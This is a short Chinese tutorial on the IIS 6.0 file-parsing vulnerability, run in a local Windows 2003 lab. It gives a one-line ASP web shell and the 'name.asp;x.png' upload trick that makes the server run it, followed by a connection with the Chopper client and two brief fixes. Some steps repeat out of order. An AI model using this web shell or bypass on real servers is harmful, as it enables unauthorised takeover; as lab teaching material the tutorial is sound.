Web安全 中间件之 IIS 解析漏洞(利用一个图片 拿到服务器最高权限.)
2023-09-27 14:29:29 时间
中间件的概括:
中间件是指提供 系统软件 和 应用软件 之间连接的软件,以便于软件各部件之间的 沟通,特别是应用软件对于系统软件的集中的逻辑,在现代信息技术应用框架(比如:Web服务、面向服务的体系结构等中应用比较广泛.)
目录:
识别 中间件 方式.(这里我用的 火狐浏览器 安装的工具.)
(5)访问网站 http://127.0.0.1 或者是 网站计算机的地址.
(2)把文件命名为 *.asp;*.png 图片格式( 比如:hhh.asp;bgxg.png ),然后上传到服务器.
(3)访问 图片的地址.(因为 IIS6.0 中间件有解析漏洞,所有图片里面的代码被执行了.)
免责声明:
严禁利用本文章中所提到的工具和技术进行非法攻击,否则后果自负,上传者不承担任何责任。
Web常见的中间件:
(1)IIS (2)Apache (3)Nginx (4)Tomcat (5)JBoss (6)Weblogic
虚拟机下载:
win 2003 链接:https://pan.baidu.com/s/1z236X0shvHMHPY6jqSvwpQ
提取码:tian
识别 中间件 方式.(这里我用的 火狐浏览器 安装的工具.)
IIS6.0 服务器的设置.(这里我使用的是默认的网站.)
(1)先在网站的根目录下,创建一个文件.
(2)设置网站 默认页面.
(3)添加 访问权限.
(4)允许 Web 服务扩展.
(5)访问网站 http://127.0.0.1 或者是 网站计算机的地址.
IIS6.0 中间件的漏洞步骤:
(1)制作 木马文件.
<%eval request("bgxg")%>
(2)把文件命名为 *.asp;*.png 图片格式( 比如:hhh.asp;bgxg.png ),然后上传到服务器.
(3)访问 图片的地址.(因为 IIS6.0 中间件有解析漏洞,所有图片里面的代码被执行了.)
(4)用菜刀进行连接.(图片的木马)
IIS6.0 文件解析漏洞修复方案.
(1)阻止上传 *.asp;*.jpg类型的文件名.
(2)做好权限设置,限制用户创建文件夹.
相关文章
- MS06-040漏洞研究(下)【转载】
- Word控件Spire.Doc更新至最新版v10.7,增强产品稳定性,修复老版本漏洞
- 渗透测试-中间件解析漏洞分析
- 如何让Ubuntu服务器远离鬼影漏洞(GHOST)影响
- 文件上传(中间件)漏洞,控制目标服务器。
- 漏洞复现----16、mini_httpd任意文件读取漏洞(CVE-2018-18778)
- Jumpserver 任意命令执行漏洞分析报告
- CVE-2020-1301: Windows SMB v1 远程代码执行漏洞通告
- 【漏洞复现】JBoss(CVE-2017-12149)反序列化漏洞
- 网络安全——命令执行漏洞概述
- 一行配置搞定 Spring Boot项目的 log4j2 核弹漏洞!
- kingdee漏洞金蝶EAS存在命令执行漏洞
- 发现高通驱动严重漏洞 360手机卫士团队获谷歌公开致谢
- 谷歌、微软与雅虎:我们希望修复漏洞以避免邮件窥探行为
- ios再现漏洞 连接到已知WiFi热点也会中招
- 黑客通过语音验证漏洞每年可从谷歌微软公司赚钱
- 中国黑客入侵Model S系统 特斯拉发更新修复漏洞
- 漏洞到底值多少钱?